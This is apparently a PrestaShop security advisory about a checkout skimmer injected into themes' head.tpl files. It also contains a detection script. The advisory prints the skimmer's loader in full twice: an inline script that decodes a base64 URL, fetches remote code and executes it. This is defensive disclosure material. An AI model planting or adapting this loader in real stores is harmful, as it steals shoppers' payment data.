We have recently identified a security threat affecting certain online stores in the PrestaShop ecosystem. A malicious script (“digital skimmer”) has been detected and may have resulted in the theft of some of your customers' payment information.
What does this digital skimmer do?
This malware works by replacing legitimate payment buttons on the checkout page with fraudulent buttons. When a customer clicks one of these fake buttons, they are redirected to a counterfeit payment form designed to capture their payment information.
The skimmer is simply loaded via a <script> tag, written directly into the _partials/head.tpl file of the store’s active theme. This means the attacker was able to modify a file in the store.
How do I check if my store is affected?
In the front office
You can check your front office code by inspecting a page on your site (right-click, then "inspect").
Look at the <script> tags on the page. If you find the following code in one of them, your store is impacted:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
Note: The aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz part changes each time, but the code structure remains the same, and the atob() function is always used. There may be code before or after (the skimmer tries to disguise itself by being slightly different on each store).
On your server
If you prefer to check your files, you can find the same script tag in a file on your server.
Connect to your server via FTP, then navigate to the theme folder, then the active theme folder > template folder > _partials folder > head.tpl. Right-click this file, choose "view/edit", and look for the same tag:
<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>
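The file check above can be run over every template of every theme instead of opening one head.tpl by hand. The following Python script is an added example, not part of the original advisory or PrestaShop's own tooling; the `themes` default path and the function names are assumptions, and the sample input is constructed with a placeholder URL.

```python
import base64
import re
import sys
from pathlib import Path

# Inline <script> bodies, and the atob('...') literals inside them.
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
# Ways fetched text gets executed; the advisory's sample uses Function(...)().
EXEC_RE = re.compile(r"\bFunction\s*\(|\beval\s*\(")

def decode_atob(arg):
    """Decode an atob() literal for the report; None if it is not valid base64."""
    try:
        padded = arg + "=" * (-len(arg) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:
        return None

def find_loaders(text):
    """Decoded atob() targets from inline scripts that also fetch and execute code."""
    hits = []
    for body in SCRIPT_RE.findall(text):
        if "XMLHttpRequest" in body and EXEC_RE.search(body):
            hits += [decode_atob(a) or a for a in ATOB_RE.findall(body)]
    return hits

def scan_themes(root):
    """Check every .tpl file under root (assumed: the store's theme directory)."""
    report = {}
    for path in Path(root).rglob("*.tpl"):
        hits = find_loaders(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

def constructed_sample():
    """Constructed input: the loader shape shown above with a placeholder URL."""
    b64 = base64.b64encode(b"https://skimmer.example/loader.js").decode()
    return ("<head><script>(function(){var x=new XMLHttpRequest;"
            "x.open('GET',atob('%s'));x.onload=function(){if(200===x.status)"
            "try{Function(x.responseText)()}catch(e){}};x.send();})();"
            "</script></head>" % b64)

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "themes"  # assumed default path
    for path, urls in scan_themes(root).items():
        print(path, "->", ", ".join(urls))
```

Any match should be reviewed by hand, since the surrounding code differs from store to store.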
What should I do if my store is affected?
Change the passwords for all of your accesses (back office, database, FTP, SSH), and don’t forget to update the database access in the PrestaShop config file.
If you have any doubts about the security of your store, contact your agency or PrestaShop support.
Do I need to notify my customers?
As data controllers within the meaning of GDPR, it is your responsibility to assess whether a data breach has occurred and, if so, to carry out the required notifications. In accordance with Articles 33 and 34 of the GDPR, any breach likely to result in a risk to rights and freedoms must be reported to the competent supervisory authority within 72 hours, and to the affected individuals in the event of a high risk. Please contact the relevant data protection authority in your country.
⚠️ At this stage, we strongly recommend performing a thorough security check of your PrestaShop stores and ensuring that none of them have been compromised.